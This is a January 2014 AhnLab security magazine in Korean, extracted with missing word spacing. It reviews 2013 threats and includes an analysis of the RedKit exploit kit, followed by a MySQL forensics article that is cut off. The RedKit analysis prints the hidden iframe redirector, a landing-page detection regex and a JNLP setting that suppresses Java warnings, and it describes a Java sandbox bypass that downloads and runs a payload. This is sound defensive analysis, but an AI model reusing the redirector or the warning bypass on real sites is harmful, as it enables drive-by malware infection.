안랩온라인보안매거진 2014. 01 2013 Reviews & 2014 Predictions
월간 2014. 01 CONTENTS 3 CEO Message 안랩의가장큰힘은고객입니다 4 Special Report 2013 Reviews and 2014 Predictions 끝모르는사이버공격 다양화 고도화 가속화 8 Threat Analysis 레드킷익스플로이트키트 전격해부 16 Tech Report MySQL Forensics 2부 _InnoDB, 구조를알면데이터가보인다 20 it&life 타깃공격, 스피어피싱 의창끝에서시작된다 23 Statistics 2013년 11월보안통계및이슈 27 AhnLab News 안랩권치중號출범, 내실경영에초점맞춘다 2013 한국 CFO 대상 안랩김기인전무 2
CEO Message Change & Focus 안랩의가장큰힘은고객입니다 고객여러분! 2014년갑오년 ( 甲午年 ) 새해가밝았습니다. 갑오년은 말띠해 중에서가장진취적이고활달하다는 청마 ( 靑馬 ) 의해 입니다. 예부터말은신분과행운, 성공을상징한귀한동물입니다. 여러분모두행운과성공이가득한한해보내시길기원합니다. 지난 2013 년은안랩이매출성장과글로벌성장의발판을마련한중요한한해였습니다. 국내대표소프트웨어인 V3 제품군의새로운버전을 선보였으며, 다차원분석플랫폼을적용해속도와성능측면에서획기적인개선을이루었습니다. 또한 APT 사전대응솔루션인트러스와처는 글로벌경쟁력을갖춘제품으로서안랩의새로운성장동력으로급성장했습니다. 그러나지금의시장상황은그리녹록하지만은않습니다. 글로벌금융위기의여파로인해세계경제의불확실성이지속되고있습니다. IT 시장 조사기관인한국 IDC 도 2013 년에이어 2014 년국내 IT 시장이처음으로 2 년연속마이너스성장률을기록할것으로전망했습니다. 안랩은이러한시장상황에효과적으로대응하기위해 변화 (Change) 와 집중 (Focus) 이라는두가지전략을선택했습니다. 안랩은경쟁사보다발빠르게 변화 (Change) 하여경쟁우위를선점할것이며, 새로운기술뿐만아니라고객의변화에도빠르게대처하는기업으로거듭날것입니다. 또한 고객의가치 에 집중 (Focus) 하겠습니다. 안랩의핵심가치중하나는 고객의소리에귀를기울이고고객과의약속은반드시지킨다 입니다. 안랩은고객의관심과기반으로설립되었고현재와미래성장의가장큰힘이고객임을잊지않겠습니다. 고객의마음을얻는것이매출을올리는것보다더어렵다고합니다. 안랩은 2014 년에도고객을먼저생각하고, 고객을만족시키는제품과서비 스를제공하는기업이되도록노력하겠습니다. 2014 년갑오년에는소망하는모든일이풍성한결실을맺으시길바랍니다. 또한고객여러분의가정에건강과행복이가득하길기원합니다. 새해복많이받으십시오. 안랩 CEO 권치중 3
Special Report Reviews & Predictions 2013 Reviews & 2014 Predictions 끝모르는사이버공격 다양화 고도화 가속화 2013년우리의정보통신환경은그다지안전하지못했다. 3월과 6월에대규모의보안사고가발생했고, 점차확산되고있는여러모바일기기들로침투하려는악성코드들도늘어났기때문이다. 특정조직에대한치밀한분석을통해전략적침입을시도하는 APT(Advanced Persistent Threat) 공격도증가하는한편, 불특정다수를향한무차별적인악성코드유포도동시에진행되고있다. 금융정보를탈취해금전적이득을노리는가하면, 기업의핵심기술유출이나국가핵심인사에대한정보를감시하는경제적 정치적행위도나타나고있다. 국가단위의규모, 매우민감한사안에대한접근인만큼접근수법도기술적으로고도화, 정교화되고있다. 개인과조직, 국내와국외, 특정과불특정, 소프트웨어와하드웨어등악성코드는이제어느한곳만을겨냥하지않는다. 특히나 2013 년보안시장에서는그경계가허물어지는양상을보였고, 2014년에는그것이더욱심화될것으로예상된다. 안랩보안전문가들이국내보안위협의동향을정리 전망했다. 2013 년보안위협동향 _ 공격도, 방어도 업그레이드 1. 대규모 APT 보안사고 동시다발적피해 2013년 3월 20일금융사와방송사를대상으로한대규모공격 ( 안랩진단명 Trojan/Win32(64).XwDoor), 석달뒤인 6월 25일정부와공공기관에대한 DDoS 공격 ( 안랩진단명 Trojan/Win32(64).Ddkr) 은사회적으로큰파장을일으킨보안사고였다. 이공격들은좀비 PC 를이용했던지난 2009년 7 7 DDoS나 2011년 3 4 DDoS와는달리, APT 유형의공격이국내기반시설에동시다발적피해를준사례로꼽힌다. 이전에는불특정다수에대한무차별적인악성코드의유포형태가많았다. 하지만최근에는특정프로그램의업데이트기능취약점, 웹취약점, 스피어피싱이메일, 혹은장시간분석을통한내부인프라공격등의기법이활용되고있다. 특히 2013년 6월 25일공격은, 3월 20일공격이후취해진민관합동조사단과보안업체의조치에대응하여 MBR 삭제및 MBR 코드수정, 5.3MB에서 524KB로데이터영역삭제간격의축소, 계정암호변경등분석과복구가어렵도록단기간내악성코드를업그레이드하는기민함을보여주었다. 이같은 APT와안티포렌식 (Anti-Forensics) 혼합공격기법의사용에따라, 2013년은디지털포렌식 (Digital Forensics) 기법과포렌식준비도 (Forensics Readiness) 의필요성이어느때보다증대된한해였다. 2. 치밀한 APT 공격그룹 국제적규모 2013년국내 APT 공격은, 특정국가와기관의지원을받아국내국방기술이나제조관련기업의첨단기술유출을목적으로하는것과게임소스및인프라구축기술유출을목적으로하는활동이활발했다. 국내에서활동중인 APT 공격그룹은다음과같은특징을보였다. 1) 외부업데이트서버또는서드파티제품을통한내부네트워크침투 2) 특정산업군에서업무상필요한웹사이트를수정, 해당사이트로접속할때악성코드에감염되는워터링홀 (Watering-Hole) 기법을사용하여기업다수에동시침투 3) 안티포렌식기능적용, MBR 코드패치와메모리에로드된뒤삭제되는기능을갖는악성코드를제작해보안프로그램의진단 치료시생존율높임 4) 기업에서주로사용하는 AD(Active Directory) 서버를공격해도메인간이동, 기업내 PC 복구를위해자체제작한복구 CD의비활성화처리가되지않은마스터계정과암호, 키로거, 패스더해시 (Pass The Hash) 공격기법등을이용하여탈취된인증을통해내부자원에자유로이 4
접근및작업수행 5) 공격을통해획득한인증서를즉각적으로다른기업공격에사용및공격그룹별로다른악성코드사용 6) 피해기업의대응에즉각적인반응 ( 주요악성코드의기능변경, 침해대상변경, 재작성된스피어피싱메일을통한침해대상확대 ) 7) 공격대상의내부메일, 유출정보독해및위조할수있는한국어에능통한인력활용이와같은 APT 공격기법을사용하는국제적사이버산업스파이그룹은공격목적에따라국가, 군사기관이나범죄집단의지원을받고있는것으로추정되며다국어에대한처리가가능한인력으로구성되어있다. 풍부한자본과체계적인공격조구성, 기술력을바탕으로여러국가의고급정보를유출하는것뿐만아니라유출된인증서, 침해된서버를이용하여지속적인국내외공격을수행하고있다. 3. 스미싱모바일악성코드 폭발적증가 2012년 30여건에불과했던스미싱악성코드는 2013년에는 11월까지만 4868건이확인되었다. 초기에는소액결제인증문자를유출하는기능으로시작했으나최근에는스마트폰에설치된은행앱의종류를식별하고설치된은행앱을악성앱으로교체하는파밍형태가많이발견되고있다. 또보이스피싱과결합한악성앱도확인되었다. 정부와보안업체들은다양한방법을통해스미싱악성코드의피해를예방하기위해노력하고있으나, 스미싱악성코드는꾸준히발견되고있으며스마트폰사용자의금전피해도계속해서늘어나고있다. 4. 관리자계정정보를직접노리는악성코드변형확산 2013년초부터발견된특정사이트들의 관리자계정정보탈취악성코드 의변형이 IE(Internet Explorer) 제로데이취약점 (CVE-2013-3897) 을이용하여급속히국내에유포되었다. 해당보안취약점에대한패치가 10월에발표되었으니상당히많은시스템이감염된것으로추정되고있다. 확인된바로는, 국내특정 CDN(Contents Delivery Network) 업체를통해서운영중인일부웹사이트들이악성코드배포지로악용되었다. 악성코드는취약점셸코드부터백신무력화증상이나타나는데, 이후다운로드되는악성코드에도같은기능이존재하여감염된시스템에설치된보안프로그램을무장해제한다. 변형에따라서탈취하려는관리자계정의웹사이트목록은다르지만, 2013년 10월에마지막으로확인된변형은무려 95곳의웹사이트관리자계정을노렸다. 여기에는언론사와기업들이다수포함되어있었다. 탈취된계정을이용하여서버를장악하면기업내부에침투하거나민감한정보를훔쳐낼수도있으며, 해당웹사이트를악성코드유포지나경유지로도사용할수있다. 이악성코드는 DDoS 증상을유발하는것도확인되었는데, 내부에존재하는관리자계정탈취웹사이트와별도의특정도메인들 (2013년 10월발견변형기준 19곳 ) 에대하여차례로파일다운로드및실행기능을수행하였다. 그러나실제파일이존재하지않는경우가대부분이었고이는웹서버에부하를발생시키는 DDoS 증상을유발하였다. 5. 국지화되는소프트웨어취약점악용악성코드는교회, 학교, 관공서, 호텔, 택배, 웹하드등일상생활에서손쉽게접근하는다수의국내웹사이트들에서더욱기승을부렸다. 특히, 어도비 (Adobe) 의플래시플레이어 (Flash Player) 보다오라클 (Oracle) 의자바 (Java) 와마이크로소프트 (MS) 의인터넷익스플로러 (IE) 취약점을이용하는공격사례가더많았다. 자바는주요제품군에비해상대적으로보안업데이트가소홀할수있기때문에웹공격툴킷 (Web Exploit Toolkit) 같은경우버전별자바취약점들을골고루활용하고있다. 또한, IE상의 Use-After-Free 취약점은 MS의보안업데이트속에서매월빠지지않고등장할정도로꾸준히보고되는취약점이다. 이와같은유형인 CVE-2013-3897 취약점은제로데이취약점으로등장하여대표적인웹공격툴킷 Chinese Kit(CK) 에포함되어지금도활발하게이용되고있다. 이러한웹을통한글로벌제품군을대상으로하는공격사례외에도몇년전부터는국내소프트웨어의취약점을악용하는사례가점차증가하고있다. 국내의대표적인문서작성소프트웨어인 아래아한글 에서보고되는취약점수가눈에띄게증가하였고, 스프레드시트프로그램인 한셀 에서도 2013년 6월에처음으로유사공격형태가발견되었다. 6. 인터넷뱅킹악성코드 금전피해확대 2013년 6월발견된온라인게임핵 (OnlineGameHack) 악성코드에서기존에없었던국내인터넷뱅킹사이트에대한정보유출기능이확인되었다. 국내감염자가많은온라인게임핵악성코드에인터넷뱅킹정보유출기능이추가됨으로써금전적피해규모가확대되었다. 이악성코드에서사용한각인터넷뱅킹사이트별 보안모듈무력화 및 이체정보변조 의기능은기존의인터넷뱅킹악성코드에서볼수없었던새로운기법이다. 보안모듈무력화 는각인터넷뱅킹사이트에서사용하는보안모듈중인증서패스워드및이체정보암호화를담당하는부분을무력화하는 5
것으로메모리상의특정코드에대한패치를통해이루어진다. 이악성코드의최초발견이후공격대상보안모듈도지속적으로추가되었으며, 보안모듈이업데이트될때마다변경된코드패턴에맞추어악성코드도변경되었다. 이체정보변조 는 2013년 9월부터새롭게추가된기능이다. 정상적인계좌이체과정중에 이체계좌번호 와 이체금액 을수정해공격자에게이체되도록하였다. 이러한공격을위해악성코드는인터넷뱅킹사이트별로사용하는고유한자바스크립트패턴정보를갖고있으며, 이중이체에필요한정보를변조하여공격을시도한다. 이러한 이체정보변조 공격은은행 2곳에서만제한적으로이루어졌다. 이같은새로운공격방식은인터넷뱅킹시지정 PC 및 OTP를사용할때에도피해를줄수있다. 또한, 피해를막기위해서는뱅킹사이트별로다양한보안업체의모듈들에대한업데이트가필요한데, 이러한점에서피해예방이쉽지않은상황이다. 2가지형태의공격에대한예방을위해서인터넷뱅킹사용자는비정상적으로은행거래가종료 ( 강제로그아웃 ) 된경우, 인증서를갱신하거나금융기관을통해해당계좌에대한거래중지를요청하고악성코드감염여부를확인하는것이필요하다. 또한, 이체후에는반드시이체내용을확인해야한다. 7. 랜섬웨어고도화국내에서는아직큰문제가아니지만, 여러나라에서랜섬웨어 (Ransomeware) 피해가발생하고있다. 랜섬웨어는시스템부팅시암호를요구하거나파일을암호화해시스템을정상적으로사용하지못하게하고돈을요구하는악성코드종류이다. 랜섬웨어의시초는 1989년으로거슬러올라간다. 1989년 12월 8일부터 12일까지 PC 사이보그사 (PC Cyborg Corporation) 의 에이즈정보 (AIDS Information) 디스켓이영국, 유럽, 아프리카, 오스트레일리아등으로보내졌다. 이프로그램은에이즈에대해다루고있다고주장하지만실제로는하드디스크의루트디렉터리정보를암호화하는트로이목마였다. 현대적랜섬웨어는 2005년러시아에서발견된 Gpcode이다. 당시랜섬웨어의상당수는간단한암호화기법을이용해악성코드분석으로복구도구를만들수있었다. 2013년하반기사용자사진, 동영상, 문서등을암호화하는크립토락커 (cryptolocker) 가여러나라에서피해를일으켰다. 감염되는순간암호해제를할수있는키를서버에생성하고암호해제를위한돈을요구한다. 달러, 유로, 비트코인류의가상화폐등다양한방식으로지불할수있다. 특정시간에돈을입금하지않거나사용자가악성코드제거를시도하면서버에생성한키를파괴해복구하지못하도록만든다. 국내에서는 2011년중앙아시아지역에서제작된랜섬웨어를번역기를이용해만든조잡한한국어판이발견된바있지만, 현재까지대규모피해는확인되지않고있다. 그러나다른나라에서는시스템을사용하지못하게하고협박하는방식이널리이용되고있다. 국내외악성코드제작자와범죄조직에서국내사용자를대상으로한한국형랜섬웨어가등장할가능성을배제할수없다. 2014 년보안위협예측 _ 공격에 경계는없다 1. APT 공격기법고도화, 불특정대상공격도확대 2013년에등장한악성코드의상당수는일반사용자의시스템정보를수정한후정교하게위조된가짜금융사이트로유도하여사용자의금융정보를빼가는기법을사용했다. 또한, 온라인게임머니를탈취하기위한온라인게임핵부류와금융정보를추출하기위한뱅커 (Banker) 부류의기능이구분되지않을정도로유사해지고있다. 악성코드감염이실제금융사고로이어지는사례가증가하고있어악성코드제작목적이금전적이익을위한직접적공격으로변화하고있음을알수있다. 정보유출에주로사용되는두가지악성코드종류의기능과목적의변화로볼때, 2014년에등장할악성코드의상당수는 APT 공격과구분이되지않을정도로유사하거나융합된형태로나타날것으로예상된다. 따라서 2014년 APT 공격은이전처럼특정대상에대한공격도지속하겠지만, 불특정다수를대상으로하는광범위한공격도확장될것으로보인다. 또한, 기존 APT 공격과워터링홀 (Watering-Hole) 공격의경계가허물어질것으로추정된다. 특히금전적이익을위해무차별적으로악성코드를유포해비트코인마이닝을시도하는국내사례도등장할수있을것이다. 2. 전자금융사기와사이버범죄의산업화 2013년악성코드를이용한전자금융사기에는피싱, 파밍, 보이스피싱, 스미싱, 메모리해킹등다양한수법들이사용되었다. 사용자의금융정보와예금을탈취하기위해서악성코드에사용한기술들이점점정교화, 고도화되고있다. 악성코드는단순히제작자들의실력을뽐내기위한도구에그치는것이아니라온라인상에서거래되는재화를탈취하는도구로써사이버범죄의산업화에사용되고있다. 2014년에도악성코드제작자들은응용프로그램취약점, 정상프로그램변조, USB와같은외부저장매체접근등다양한방법을통해서악성코드유포를시도할것이며, 인터넷뱅킹과같이온라인상에서돈을취급하는특정금융서비스를대상으로하는공격역시증가할것으로예상된다. 3. 악성코드유포방법의다양화 고도화 2014년에는악성코드유포방법이더다양해지고, 더고도화될것으로보인다. 지금까지는업데이트취약점이나스피어피싱등을통해불특정다수에게악성코드를대량으로유포하고목적에따라변종을유포하는방식이었다면, 2014년에는기존의방식외에악성코드를대량으로유포 6
할수있는새로운방법이등장할가능성이높다. 예를들어, 다수사용자가접속하는 CDN이나도메인관리업체및 ISP 관리업체를통해다수의악성코드를배포하는공격방식이증가할수있다. 공격자는국내주요시스템또는다수시스템공격을목적으로국내 VPN 서비스나국내도메인주소를신청하기도한다. 국내서비스의상당수가별도의본인인증이나확인절차없이과금의여부로만서비스사용을허가하므로악의적목적으로제작한사이트들의활동을막기어려울것으로예상된다. 또한, 공격자가 CDN이나도메인업체, 특정 ISP에서관리하는서비스제공시스템에침입하여무결성검증이취약한콘텐츠나제품업데이트파일을변조하면다양한도메인과서비스를통해동시에악성코드가배포될수있다. 따라서 2014년에는도메인등록이나관리절차및관리자망의사고인지에관한주의가필요하다. 4. 윈도XP 지원종료에따른보안위협증가 2014년 4월 8일, 윈도XP에대한모든지원이종료될예정이다. 이후발견된취약성에대한보안업데이트도더는제공되지않아윈도XP는제로데이공격에무방비상태가될것으로예상된다. 따라서지원종료이후보안위협에대한보호는안티바이러스, 방화벽등 PC용보안솔루션에전적으로의존하게된다. 2013년현재윈도XP는 IE 9 이상버전이지원되지않으며, 악성코드감염에취약한 IE 6~8 버전이주로사용되고있어보안위협에노출될가능성이높다. 2013년국내컴퓨터의 20% 가윈도XP를사용하고있는것으로파악되는데, 윈도XP 사용자들은지원종료일이전에윈도7 또는 8 등으로업그레이드해야한다. 5. 특정대상을감시하거나정보를유출하는스파이앱증가 2013년 SMS나모바일 SNS를통해돌잔치, 결혼초대장과택배, 카드결제내역으로위장한모바일스미싱악성코드가전파되었다. 이악성코드는동일한앱을다수의사용자에게배포하기위해제작, 공개적으로유포되어쉽게발견되었다. 하지만특정기업내부기밀유출이나감시를목적으로제작된모바일스미싱악성코드가특정사용자를대상으로유포된다면그존재가외부로쉽게노출되지않는다. 특히항상휴대하며, 개인적 업무적으로수많은정보가저장되는스마트폰은활용도에비례해사용자를감시하거나필요한정보를유출하기에최적이라할수있다. 모바일악성코드를활용해특정대상을감시하거나정보를유출하는스파이앱이활용될가능성이높아질것으로예상된다. 6. 사이버정보에대한국가적인식변화 2013년미국국가안보국 (NSA) 의광범위한정보수집을폭로한에드워드스노든비밀문건과중국인민해방군의한조직이미국을거점으로하는기업과최소 141개기관의데이터유출등국가간정보수집사건이발생하였다. 국가를대상으로하는수많은도 감청의실체가드러난만큼국가간의사이버전쟁은더욱정교해지고가속화될것이다. 국가기관이적과우방을가리지않고정보수집활동을벌였다는의혹은새삼스러운일이아닐수도있지만, 전세계에실체가공개됐으니자국의이익을위한국가단위의준비는가속될것이다. 또한고도화된공격과데이터유출의피해를줄이기위해암호화와더욱발전된보안기술이요구될것이다. 7. 하드웨어 BIOS와펌웨어업데이트에악성코드포함시도 2013년 4월특정바이오스 (BIOS) 제작업체의소스코드가유출되었으며, 10월에는특정회사의라우터펌웨어에백도어가포함된것이확인되었다. 또한, 러시아에수출된중국산다리미와주전자가무선인터넷에접속해악의적인기능을수행한다는보도가있었다. 태블릿 PC와같은전자기기는제작업체에서배포한펌웨어파일다운로드를이용한업데이트방식을사용하고있지만제조사가개발부터업로드까지철저하게관리하는지보장할수없다. 이와같은하드웨어에내장된소프트웨어를통한악의적인기능수행가능성이점차커지고있다. 이러한경로에악성코드를포함하기위해서는제조업체가의도적으로제작하거나내부공모자가있어야한다. 또는공격자가내부시스템에침입해서수정해야하므로하드웨어에악성코드가포함될가능성은낮지만, 악의적인기능이포함되었을때는발견하기가쉽지않다. 특히국가간사이버공격의존재가점차알려지면서기존사이버범죄자들뿐아니라국가기관에서도정보수집을위해하드웨어제작업체를이용하는게아닌가하는의심이확산되고있다. 악성코드를포함하기위한과정이어렵기때문에폭발적으로증가하기는어렵겠지만, 2014년에는하드웨어나펌웨어등에악의적인기능을수행하는코드를포함하는공격이시도될것으로전망된다. 7
THREAT ANALYSIS RedKit Exploit Kit RedKit Exploit Kit 레드킷익스플로이트키트 전격해부 2013년 3월미국 NBC.com의메인페이지가공격당해악성코드가유포되었던사례가발생했다. 이때사용된것이 레드킷익스플로이트키트 (RedKit Exploit Kit, 이하레드킷 ) 이다. 레드킷은해외에서는최근가장활발하게활동하는익스플로이트툴킷 (Exploit Toolkit) 중의하나로알려져있고, 국내에서도영향을받는사례들이속속발견되고있다. 이글을통해레드킷의자세한분석정보를소개하고자한다. 레드킷은 2013 년초에프라이빗익스플로이트킷 (Private Exploit Kit) 이라는이름으로소개된바있다. 레드킷 (RedKit) 이라는이름은본래의 제작자가공식적인이름을명시하지않아서, 이를발견하고분석한분석가가빨간색스키마를사용한데에서붙여진이름이다. [ 그림 1] 레드킷관리자페이지 ( 출처 : Trustwave) 8
레드킷제작자는악성 URL이 1~2일정도면추적되고차단되는것을회피하기위해시간단위로새로운 URL을생산하는 API를제공한다. 이로인해실제분석하는과정에서살아있는 URL을찾기가쉽지않고분석하는동안 URL이유지되지않는다는점도문제였다. 레드킷은아직까지다수의취약점을이용하지는않고, 주로자바취약점을공격대상으로삼고있다. 해외에서는최근가장활발하게활동하는익스플로이트툴킷 (Exploit Toolkit) 중의하나로알려져있고, 국내에서도영향을받는사례들이속속발견되고있다. [ 그림 2] 웹익스플로이트툴킷통계정보 ( 출처 : urlquery.net) 레드킷익스플로이트킷스크립트구성 [ 그림 3] 레드킷익스플로이트킷의전체연결구성 A. Redirector - 정상적인사이트에포함되어레드킷랜딩페이지로리다이렉션 (Redirection) 하는역할을수행 - 트위터연결로위장하여 iframe src 를통해랜딩페이지링크로연결 </div><iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://[ 서버주소 ]/acwf. html?i=1306415></iframe></body></html> [ 그림 4] 리다이렉션코드 B. 랜딩페이지 - 랜딩페이지는아래와같은링크패턴을가짐 (html 또는 htm) http://[ 서버주소 ]/[ 영문소문자 4자리조합 ].html?[ 영문소문자 1자리 ]=[ 숫자 7자리 ] http://([^\?]*)\/[a-z]{4}\.html\?[a-z]{1}=[\d]{7}$ [ 그림 5] 랜딩페이지링크패턴 9
- 자바와 PDF 취약점을공격하는랜딩페이지 ( 초기버전 ) 는 [ 그림 6] 과같음 ( 더자세한정보는 Appendix 참고 ). [ 그림 6] 자바와 PDF 취약점을공격하는랜딩페이지 - JNLP(Java Network Language Protocol) 를이용한자바취약점공격랜딩페이지는 [ 그림 7, 8] 과같음. [ 그림 7] JNLP 파일을통한리다이렉션연결구조 [ 그림 8] 자바취약점공격랜딩페이지 특히, JNLP 파일에서 applet_ssv_validated 를 true 로설정할경우, Java 1.7.21 이전버전에서는보안경고팝업창을띄우지않고서 명되지않은자바애플릿을실행할수있다. [ 그림 9] JNLP(Java Network Language Protocol) 파일 10
주요취약점및악성코드 - 레드킷은다수의취약점을동시에공격하지는않으며, 주로다음과같은취약점을이용하는것으로알려져있음. CVE # 파일명링크연결방법악성코드다운로드 URL CVE-2012-1723 332.jar Java Applet hxxp://[ 생략 ]lleurs.com/33.html CVE # 파일명링크연결방법악성코드다운로드 URL CVE-2012-0422 887.jar Java Applet hxxp://[ 생략 ]lleurs.com/41.html CVE # 파일명링크연결방법악성코드다운로드 URL CVE-2010-0188 987.pdf Iframe hxxp://[ 생략 ]nc.org/62.html CVE # 파일명링크연결방법악성코드다운로드 URL CVE-2013-2423 pb.jar JNLP hxxp://[ 생략 ]on.de/36.html (AES encrypted file) 탐지패턴및방법 A. 네트워크탐지정보 - TrusGuard : 2013.06.25 : malware_redkit_redirect(http) 시그니처배포 B. 파일진단정보 - Ahnlab ASD : Trojan/JS.Retkid(RedKit Landing Page) - Ahnlab V3/ASD : Dropper/Win32.Daws( 자바취약점을통해다운로드된실행파일 ) 11
Appendix A. 주요취약점상세분석 CVE # 파일명취약점보안게시판 CVE-2010-0188 987.pdf Adobe Reader TIFF 코드실행취약점 http://www.adobe.com/support/security/bulletins/apsb10-07.html 해당취약점파일의오브젝트 2 번에는 [ 그림 10] 과같이자바스크립트가존재하고, 해당스크립트안에서취약점의원인이되는 TIFF 파일을 생성하고힙스프레이기법을이용해서셸코드를실행한다. [ 그림 10] PDF 악의적인오브젝트 [ 그림 11] 난독화해제된악성스크립트콘텐츠 12
CVE # 파일명취약점보안게시판 CVE-2013-2423 pb.jar Oracle Java Sandbox bypass 취약점 http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html 해당자바파일에는 lookup().findstaticsetter 메소드상의취약점으로인하여 SecurityManager 값을 NULL 로세팅하여샌드박스를우회할 수있는 CVE-2013-2423 취약점이존재한다. [ 그림 12] 취약점발생원인자바코드 취약점발생후에 URL 로부터악의적인파일을받아서 %temp%(java.io.tmpdir) 폴더에랜덤문자 6 자리.exe 파일을생성한후실행한다. 악의적인파일은 name 파라미터로부터전달받은데이터를 [ 그림 13] 과같이디코딩한 URL 로부터다운로드된다. [ 그림 13] URL 디코딩자바함수 해당 URL 로부터받은데이터는 AES 로암호화된데이터로, AES/CBC/NoPading 조건으로복호화하면악의적인실행파일을얻을수있다. 13
[ 그림 14] 복호화수행하는자바함수 복호화된데이터에서 Co6RkBrX 문자열의존재를확인하고, 2 개또는 1 개의실행파일 (PE) 을각각추출하여실행한다. [ 그림 15] 암호화된데이터 (AES) [ 그림 16] 복호화된실행파일 자바취약점을통해다운로드된악성코드는다음과같은악성코드이다. Appendix B. 클라이언트정보수집 (PluginDetect) 레드킷의경우, 클라이언트시스템 ( 사용자 PC) 에설치된애플리케이션들의정보수집 (fingerprinting) 을위해블랙홀익스플로이트킷과쿨익스플로이트킷에서사용하는 플러그인디텍트 (PluginDetect) 라이브러리를사용한다. 해당라이브러리는 Eric Gerds에의해서자바스크립트로구현된브라우저플러그인 (plugin) 탐지라이브러리이다. 해당라이브러리를이용하면다음과같은정보를얻을수있다. 14
Major Browser IE Gecko Safari Chrome Opera Mozilla Netscape SeaMonkey Flock Plugin QuickTime DevalVR Flash Shockwave Windows Media Player Silverlight VLC Player Adobe Reader Generic PDF Reader RealPlayer Java 라이브러리는다음과같은절차를통해손쉽게사용이가능하다. 사용절차 1) Plugin 선택 선택옵션 Java,QuickTime,DevalVR,Shockwave,Flash,Windows Media Player,Silverlight,VLC Player,Adobe PDF Reader,Generic PDF Reader,RealPlayer 2) Method 선택 getversion isminversion onwindowloaded ondetectiondone 설치된버전획득설치된버전이특정버전이상인지체크 Window가로드될때실행할함수지정플러그인이탐지될때실행할함수지정 1), 2) 번및기타옵션을선택한후, 스크립트생성버튼을누르면다음과같은코드가생성됨. 3) 스크립트생성 실제레드킷랜딩페이지안의코드에는 [ 그림 17] 과같이플러그인디텍트라이브러리본체가존재하고, 어도비리더버전을확인한후 iframe 으로 PDF 취약점파일을연결시킨다. [ 그림 17] 레드킷랜딩페이지상의플러그인디텍트 15
Tech Report MySQL Forensics MySQL InnoDB Type 의데이터파일구조분석과삭제된레코드의복구방안 구조를알면데이터가보인다 오픈소스라이선스기반의 DB 관리시스템인 MySQL은일반적으로 InnoDB 또는 MyISAM이라는두가지의저장방식 (Storage Engine) 중하나의방식을사용하여데이터를저장한다. InnoDB와 MyISAM은각각의절차와구조에따라데이터를읽거나저장한다. 따라서이들저장방식의구조를이해하면데이터에직접접근할수있을뿐만아니라 DB 내부의완전히삭제되지않은데이터에대한접근및복구도가능하다. 포렌식에서삭제된데이터의복구는공격자의고의적인데이터은닉이나삭제를밝혀낸다는점에서중요한의미를갖는다. 이글에서는 MySQL의저장방식중 InnoDB 저장방식의구조를분석하여직접적으로데이터에접근하는방법을살펴보고삭제된데이터의복구방안에대해알아본다. MyISAM 저장방식에대해서는 3부에서살펴볼예정이다. < 연재목차 > 1부 _MySQL의현황및포렌식적의미 (2013년 12월호 ) 2부 _MySQL InnoDB Type의데이터파일구조분석과삭제된레코드의복구방안 ( 이번호 ) 3부 _MySQL MyISAM Type의데이터파일구조분석과삭제된레코드의복구방안 InnoDB는대용량데이터를처리하기위해설계된저장방식이다. 기존의저장방식과는달리트랜잭션기능을포함하여안전성을크게강화하였으며외래키 (Foreign Key) 지원을통한무결성의보장으로데이터의품질을향상시키는데기여한다. 이같은다양한장점을기반으로 MySQL은 5.5 버전부터 InnoDB 방식을기본저장방식으로설치하고있다. InnoDB의구조적특징 InnoDB는페이지단위의각데이터들의집합체이다. MySQL 설치시설정된데이터저장경로에 ibdata 파일을생성하여관련데이터를저장한다. 하나의페이지는일반적으로 16,384바이트 (16KB) 의크기로이루어져있으며 ibdata 내부에여러개의페이지가순차적으로저장되어하나의파일을이룬다 ( 경우에따라 ibdata 파일을분할하여다수의파일로저장하는것도가능하다 ). [ 그림 1] 은 ibdata 파일의내부구조를나타낸것이다. 일반적으로시스템테이블 (System Table) 영역과트랜잭션 (Transaction) 영역, 그리고데이터 (Data) 영역으로나눌수있다. [ 그림 1] ibdata 파일의구조 System Table 영역 Transaction 영역 Data 영역 16
시스템테이블영역은 DB의시스템이생성한영역이다. 사용자가생성한데이터베이스와테이블, 테이블에대한메타정보등을정리하여관리한다. 또한시스템테이블영역을통해현재어떤데이터베이스와테이블이생성되어있는지파악할수있으며테이블내에생성된필드, 필드의데이터타입등다양한정보수집이가능하다. 더와같은다양한속성값이순차적으로위치한다. 트랜잭션영역은 DB가쿼리를처리하는과정에서시스템상의오류가발생할경우원상태로복구하기위해쿼리처리이전의데이터를보관하는영역이다. 데이터영역은실제데이터가저장되는영역으로, DB 사용자가저장한모든데이터는이영역에저장된다. 이영역에서는 DB의성능을 유지하기위해데이터삭제시, 완전삭제대신데이터가삭제된것으로표시만하고삭제영역에데이터를그대로유지한다. 이같은특징때문에삭제된데이터의복구가가능하다. InnoDB 구성파일앞서설명한바와같이 InnoDB는모든데이터를 ibdata 파일에페이지단위로기록한다. 디스크기반저장방식인 MyISAM과는달리 InnoDB는각각의데이터를파일단위로따로저장하지않고하나의파일안에모두저장한다. 따라서데이터가축적될수록 ibdata 파일의용량도증가한다. InnoDB는데이터베이스를생성할때기존에설정된데이터저장위치 (ibdata 파일이존재하는위치 ) 에데이터베이스명의폴더를생성한다. 데이터베이스를생성하고테이블을생성하는경우에는해당데이터베이스명의폴더에생성한테이블명으로 frm 이라는확장자의파일을생성한다. 파일명구분설명 ibdata 파일생성된모든데이터가저장되는파일 [ 그림 2] 페이지의구조및구성요소 이름 위치 (Offset) 크기 FIL_PAGE_SPACE 0~3 4 바이트 Page 의 ID FIL_PAGE_ OFFSET 설명 4~7 4 바이트현재페이지의시퀀스번호 FIL_PAGE_PREV 8~B 4 바이트이전페이지의시퀀스번호 FIL_PAGE_NEXT C~F 4 바이트다음페이지의시퀀스번호 FIL_PAGE_LSN 10~17 8 바이트 Log 시리얼번호 FIL_PAGE_TYPE 18~19 2 바이트페이지의타입을정의 FIL_PAGE_FILE_ FLUSH_LSN FIL_PAGE_ ARCH_LOG_NO 1A~21 8 바이트파일의첫페이지 Log 시리얼번호 22~25 4 바이트 Log 관련오프셋 [ 표 2] 파일헤더항목및설명 ( 출처 : MySQL, http://dev.mysql.com/doc/internals/) < 데이터베이스명 > 디렉토리데이터베이스생성시디렉터리생성 테이블생성시해당데이터베이스디렉터리 < 테이블명 >.frm 파일내부에생성 [ 표 1] InnoDB를이루는구성파일 frm 파일은 MyISAM 방식에서도동일하게사용하는파일이다. frm 파일내부에는테이블에대한각종정보와테이블을구성하는각필드의필드명과데이터타입에대한정보가존재한다. InnoDB 저장방식으로생성된테이블은 frm 파일을생성함과동시에동일한내용을 ibdata에저장하기때문에 frm 파일이존재하지않아도데이터를복구할수있다. 따라서 